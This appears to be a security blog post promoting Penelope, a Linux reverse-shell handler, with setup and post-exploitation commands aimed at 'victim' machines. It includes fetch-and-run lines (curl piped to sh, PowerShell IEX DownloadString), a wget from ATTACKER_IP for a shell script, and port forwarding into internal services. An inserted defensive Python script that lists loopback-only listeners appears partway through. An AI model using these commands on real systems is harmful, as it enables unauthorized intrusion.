Penelope: The Ultimate Linux Shell Handler Now with Port Forwarding Support


Penelope, the advanced Linux shell handler, has just gotten even better with the addition of port forwarding support. This means if a local web service is running on a victim machine (without external exposure), you can now access it from Kali after gaining a shell via Penelope.

Created by Christodoulos Lamprinos, Penelope stands out as one of the best shell handlers due to its powerful features:

  • 🖥️ Auto TTY Upgrade – Instantly upgrades your shell without manual intervention.
  • 🧠 Run LinPEAS in the Background – Conduct recon without uploading files, using separate sessions.
  • 🌐 Port Forwarding – Now supports accessing internal victim services remotely.

GitHub Repository

🔗 https://github.com/brightio/penelope

You Should Know: Essential Penelope Commands & Techniques

1. Setting Up Penelope

git clone https://github.com/brightio/penelope.git 
cd penelope 
chmod +x penelope.py 
./penelope.py -h 

2. Starting a Listener

./penelope.py -l -p 4444 

3. Auto TTY Upgrade

Penelope automatically upgrades your shell to a fully interactive TTY, eliminating the need for:

python3 -c 'import pty; pty.spawn("/bin/bash")' 

4. Running LinPEAS in the Background

Instead of manually uploading LinPEAS, Penelope allows background execution:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh 

5. Port Forwarding (New Feature)

Access internal victim services (e.g., localhost:8080) from your Kali machine:

# On Penelope session
portfwd add -l 9000 -r 127.0.0.1 -p 8080 

Now, access `localhost:9000` on Kali to reach the victim's `8080` service.

6. Post-Exploitation with Penelope

  • Check open ports on victim (Linux):
    netstat -tulnp 
    
  • Check Windows outbound ports (if needed):
    IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Y3llowDuck/port_check_PowerShell/main/port_check.ps1') 
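
A defender-side check, added here as an example (it is not part of Penelope or of the original post): it parses `netstat -tulnp` output and lists the listeners bound only to loopback, which are the services a port forward from a shell on the host makes reachable, so they need their own authentication. The sample output and the function names are constructed for illustration.

```python
import ipaddress

# Constructed sample of `netstat -tulnp` output (not taken from a real host).
SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      1450/java
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      990/mysqld
tcp6       0      0 ::1:631                 :::*                    LISTEN      701/cupsd
tcp6       0      0 :::80                   :::*                    LISTEN      1201/nginx
udp        0      0 127.0.0.53:53           0.0.0.0:*                           640/systemd-resolve
udp        0      0 0.0.0.0:68              0.0.0.0:*                           655/dhclient
"""

def parse_listeners(text):
    """Yield (proto, ip, port, program) for each tcp/udp socket line."""
    for line in text.splitlines():
        fields = line.split()
        if not fields or not fields[0].startswith(("tcp", "udp")):
            continue  # skip the two header lines and blank lines
        host, _, port = fields[3].rpartition(":")  # last ':' separates the port
        try:
            ip = ipaddress.ip_address(host.split("%")[0])  # drop IPv6 zone id
            port = int(port)
        except ValueError:
            continue  # unparseable address or port: skip rather than guess
        ip = getattr(ip, "ipv4_mapped", None) or ip  # ::ffff:127.0.0.1 -> 127.0.0.1
        # PID/Program column is "-" when netstat runs without root
        program = next((f.split("/", 1)[1] for f in fields[4:]
                        if f[0].isdigit() and "/" in f), "-")
        yield fields[0], ip, port, program

def loopback_only(text):
    """Listeners bound to 127.0.0.0/8 or ::1, i.e. not exposed on the network."""
    return [(proto, str(ip), port, prog)
            for proto, ip, port, prog in parse_listeners(text) if ip.is_loopback]

if __name__ == "__main__":
    for proto, ip, port, prog in loopback_only(SAMPLE):
        print(f"{proto:5} {ip}:{port:<6} {prog:18} loopback-only: needs its own auth")
```

Feed it the output of `netstat -tulnp` from a host you administer in place of `SAMPLE`; anything it lists should not rely on the loopback binding as its only access control.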
    

What Undercode Say

Penelope is a game-changer for penetration testers and red teamers, especially during exams like OSCP. Its auto-TTY, background LinPEAS execution, and now port forwarding make post-exploitation smoother.

Additional Linux & Windows Commands for Security Testing

  • Linux:
    # Check running processes
    ps aux
    # Find SUID binaries
    find / -perm -4000 2>/dev/null
    # Download files from attacker machine
    wget http://ATTACKER_IP/shell.sh -O /tmp/shell.sh
    
  • Windows:
    # Check firewall rules
    netsh advfirewall firewall show rule name=all
    # List scheduled tasks
    schtasks /query /fo LIST /v
    # Test port connectivity
    Test-NetConnection -ComputerName google.com -Port 443
    

Expected Output:

A fully interactive Penelope session with port forwarding enabled, allowing seamless access to internal victim services.


References:

Reported By: Activity 7316453255054520320 – Hackers Feeds